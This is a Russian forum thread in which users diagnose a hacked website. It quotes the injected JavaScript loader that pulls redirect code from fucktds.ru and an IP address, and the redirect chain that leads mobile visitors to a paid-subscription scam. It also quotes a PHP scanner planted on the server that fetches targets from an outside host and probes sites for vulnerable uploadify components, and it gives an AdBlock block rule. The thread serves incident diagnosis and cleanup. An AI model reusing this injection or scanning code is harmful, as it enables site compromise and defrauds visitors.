Взломали сайт

Курилка 3276 просм. 37 сообщ.

Всем привет!

Кто-то взломал сайт/форум. При попытке зайти с выключенным NoScript происходит редирект на левый сайт.

Да ладно вам, у меня нет носкрипта ни в одном из трех браузеров: google-chrome, opera, palemoon, и с любого из них спокойно захожу. Может иам стоит почистить кеш браузера?

что google-chrome, что firefox - ситуация та же. Более того:

$ wget -q http://zenway.ru/plg/shjs/sh_main.min.js -O - | grep fucktds.ru
s.src='https://fucktds.ru/pF2qsd?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Добавлено позже:

Проверил вывод команды выше с шведского сервера - вывод команды идентичен.


Добавлено позже:

redix, получается что sh_main.min.js закеширован у вас в браузере :) А в сам файл в конце дописали каким-то способом заразу:

$ curl -s http://zenway.ru/plg/shjs/sh_main.min.js | tail -n 7
var d=document;var s=d.createElement('script');
s.src='https://fucktds.ru/pF2qsd?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Так что надо чинить.

нормально заходит, мидори даже для этого поставил

Привет Биг, при заходе оперой один раз промелькнула какая то страница, единственное что успел увидеть, так это довольно крупный готический шрифт, какого то зеленоватого цвета. Повторить фокус не получилось. Вот здесьговорят, что на этом ай-пи никаких других сайтов не присутствует.

Я знаю, почему у вас нет редиректа.

1. Грузится страница.
2. Подгружается и выполняется javascript код из файла http://zenway.ru/plg/shjs/sh_main.min.js и получаем в HTML вот такое:

<script src="https://fucktds.ru/pF2qsd?frm=script&amp;&amp;pid=5741&amp;se_referrer=http%3A%2F%2Fzenway.ru%2Fforum%2Findex.php&amp;default_keyword=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BB%D0%B8%20%D1%81%D0%B0%D0%B9%D1%82%20%2F%20%D0%9A%D1%83%D1%80%D0%B8%D0%BB%D0%BA%D0%B0%20%2F%20Zenway"></script>

И если пойти по сгенерированной ссылки - есть риск получить javascript код, который сделает редирект. А есть риск получить то, что я вижу сейчас - 501 HTTP код с текстом "Sorry. Please visit us again later.". То есть, из-за перегруженного сервера вы не видите редиректа.

Хочу повторно обратить внимание, что скрипт для подгрузки кода с домена fucktds.ru сам по себе выглядит странным. А то, что удалось словить редирект не должно вызывать сомнений в выпиливании этой заразы.

У меня удаленный сервер опять заработал. Вот, что подгружается с fucktds.ru:

$ wget -q 'https://fucktds.ru/pF2qsd?frm=script&&pid=5742&se_referrer=http%3A%2F%2Fzenway.ru%2F&default_keyword=%D0%92%D0%B7%D0%BB%D0%BE%D0%BC%D0%B0%D0%BB%D0%B8%20%D1%81%D0%B0%D0%B9%D1%82%20%2F%20%D0%9A%D1%83%D1%80%D0%B8%D0%BB%D0%BA%D0%B0%20%2F%20Zenway' -O -; echo
function process() {
                window.location = "https://fucktds.ru/gateway.php?frm=dm&token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1cmwiOiJodHRwOlwvXC93YXBtaWsucnVcLz9zdWJfaWQ9NGlxc2I5ZGprY2dzNDVqIn0.AqxoSMXDH29lEorST-lfwme0qH8eB6U7F6xJPv0WHVQ";
            }
            window.onerror = process;
            process();

А теперь подумайте о том, что новых пользователей сайта у вас не будет из-за редиректа. Подумайте, что скоро браузеры начнут метить страницы вашего сайта как опасные. Подумайте, что сегодня подгружается код для редиректа, а завтра будет подгружаться код ворующий логин/пароли из форм для входа на сайт.

Я удивлен и огорчен тем фактом, что вы все еще не исправили это.

Не беспокойтесь вы так, админы тут появляются раз в год по праздникам, но тем не менее спам ботов практически нет. Даже если и не ответили, то это не значит что не видели ваши сообщения, и ничего не делают.

@ZEN, запостите ссылку на скрипт в adblock, ublock и т.п..

мимопроходил:


@ZEN, запостите ссылку на скрипт в adblock, ublock и т.п..

У меня в AdBlock ручное правило для блокировки

https://fucktds.ru/*

redix:


Не беспокойтесь вы так, админы тут появляются раз в год по праздникам, но тем не менее спам ботов практически нет. Даже если и не ответили, то это не значит что не видели ваши сообщения, и ничего не делают.

Это меня и печалит. Когда-то sysadminday.com.ru умирал на глазах, потому что ни у кого не было доступа по ftp и все предложения по изменению сайта звучали в никуда. Теперь sysadminday.com.ru не существует.

Но тут ситуация несколько иная.. К слову, я средствами форума отправил е-мейл админу пару дней назад с рекомендациями что делать (не достаточно удалить заразу, нужно пользовательские браузеры заставить принудительно обновить локальный кеш).

ZEN:


К слову, я средствами форума отправил е-мейл админу

Форумом Vovans занимается, по моему, но он появлялся уже давно, даже не скажу как.

Всем спасибо. Заразу нашёл. Причём, в неожиданном месте. Но как она туда попала - большой вопрос (((

Сейчас очень занят постоянно и нет времени заниматься сайтом. Но посматриваю время - от времени, что с ним, и ежемесячно оплачиваю VDS :)

Как на зло, ещё отвалилась и почта, что была в контактах. Поправил адрес на актуальный.

Ещё раз спасибо.


Добавлено позже:

Какие интересные скрипты находятся на сайте:

<?php
error_reporting(0);
ini_set('display_errors',0);
ini_set('max_execution_time',13400);
ini_set('log_errors',0);
ini_set('memory_limit','512M');
ini_set('default_socket_timeout',10);
ignore_user_abort();
function g($v){$p=curl_init();curl_setopt($p,CURLOPT_URL,'http://'.$v);curl_setopt($p,CURLOPT_HEADER,0);curl_setopt($p,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trid
ent/7.0;  rv:11.0) like Gecko');curl_setopt($p,CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_1);curl_setopt($p,CURLOPT_RETURNTRANSFER,1);curl_setopt($p,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($p,CURL
OPT_TIMEOUT,10);curl_setopt($p,CURLOPT_FOLLOWLOCATION,1);curl_setopt($p,CURLOPT_MAXREDIRS,1);curl_setopt($p,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($p,CURLOPT_SSL_VERIFYHOST,0);$d=curl_exec($p);
curl_close($p);return $d;}
$l=array('admin/include/uploadify/uploadify.css','admin/js/jquery.uploadify/uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','bitrix/modules/defa.tools/install/scripts/upl
oadify/uploadify.css','bitrix/modules/smanline.uploadandunzip/install/tools/smanline.uploadandunzip/uploadify/php/uploadify.css','bitrix/tools/defatools/uploadify/uploadify.css','bitrix/tools/
smanline.uploadandunzip/uploadify/php/uploadify.css','feedback/uploadify/uploadify.css','includes/uploadify/uploadify.css','js/jquery.uploadify/uploadify.css','landing/escalera/admin/upload-up
loadify.css','mod/uploadify.css','mymodules/uploadify/uploadify.css','nanomaxi/upload-uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','payment/assets/js/uploadify-v2.1.4/
uploadify.css','plugins/community/uploadify/uploadify.css','protected/modules/pictures/components/uploadify.css','assets/modules/evogallery/js/uploadify/uploadify.css','sites/all/modules/uploa
dify/uploadify/uploadify.css','uploadify/uploadify.css');
if(preg_match('/uploadifyQueueItem/mi',g('leopold24.ru/include/template/t'))){
w:
if(!file_exists(__DIR__.'/s')){$s=g('leopold24.ru/include/template/s.php?g');if(empty($s)){exit();}file_put_contents(__DIR__.'/s',$s);}
$f=file(__DIR__.'/s');
if(!file_exists(__DIR__.'/c')){file_put_contents(__DIR__.'/c','0');}
$c=file_get_contents(__DIR__.'/c');
$g=count($f);
$y=time();
while($g>$c){
$a=trim($f[$c]);
foreach($l as $ll){if(preg_match('/uploadifyQueueItem/mi',g($a.'/'.$ll))){g('leopold24.ru/include/template/s.php?r='.urlencode($a.'/'.$ll));}}
if($c++%100==0){file_put_contents(__DIR__.'/c',$c);if((time()-$y)>13400){exit();}}
}
unlink(__DIR__.'/s');
unlink(__DIR__.'/c');
goto w;
}

@vovans, приветствую. Значит я не ошибся, когда назвал именно вас. )

vovans:


Всем спасибо. Заразу нашёл. Причём, в неожиданном месте. Но как она туда попала - большой вопрос (((

Сейчас очень занят постоянно и нет времени заниматься сайтом. Но посматриваю время - от времени, что с ним, и ежемесячно оплачиваю VDS :)

Вариантов много). Если достаточно старая версия Apache, то могли и через юзерагент закачать скрипт из вне. Если логи сохранились, можно поизучать. Если MySQL открыт на внешку, то там тоже была веселая уязвимость позволяющая создать файл с произвольным содержимом и выполнить. Ну или еще проще - уязвимость в FluxBB.

@ZEN, мы с вами нигде не пересекались, кроме как здесь? А то до жути знакомая аватарка, и почему то ассоциируется с Ubuntu, хотя тут я могу и ошибаться.

Проблемный скрипт лежал в плагине основного сайта с 15 года. А внесли его в шаблон форума в конце мая. Ещё был скрипт, что я процитировал. Разбирать некогда, но дата правки и содержание сомнительны и это вообще в другом сайте. Все обновления системы накатываю регулярно. Коне что же, мускул наружу не торчит.

redix:


@ZEN, мы с вами нигде не пересекались, кроме как здесь? А то до жути знакомая аватарка, и почему то ассоциируется с Ubuntu, хотя тут я могу и ошибаться.

Я заядлый Debian-щик. В принципе, я посещал и посещаю разные ресурсы по линуксам. Так что не исключено, что за почти 9 лет моя аватарка где-то да попадалась. Но в последнее время я не участвую в дискуссиях и если посещает желание о чем-то написать, то делаю это на своем форуме linuxhub.ru

Понятно, буду знать. )

Интересный кусок скрипта:

var d=document;var s=d.createElement('script');
s.src='http://37.139.50.21/H3td1w?frm=script&'+window.location.search.replace('?', '&')+'&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(docum
ent.title) + '';
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

Если вы входите через мобильный телефон, вас перекидывает на скрипт

'http://37.139.50.21/gateway.php?bla_bla_bla

откуда перекидывает на:

http://webprotect.space/16d423ebd90605c4/sub1/sub2/sub3/sub4?track_id=3hg83gnd9pj3060uoi

И там на страницу какого-то там под-под домена вашего оператора связи, где вам предлагает какую-то услугу за 30 руб в сутки, кажется, которые будут списываться со счёта вашего телефона.

Но если вы заходите не с мобильного телефона, то ничего даже не замечаете )

А откуда это появилось, таки взломали?

Написать ответ…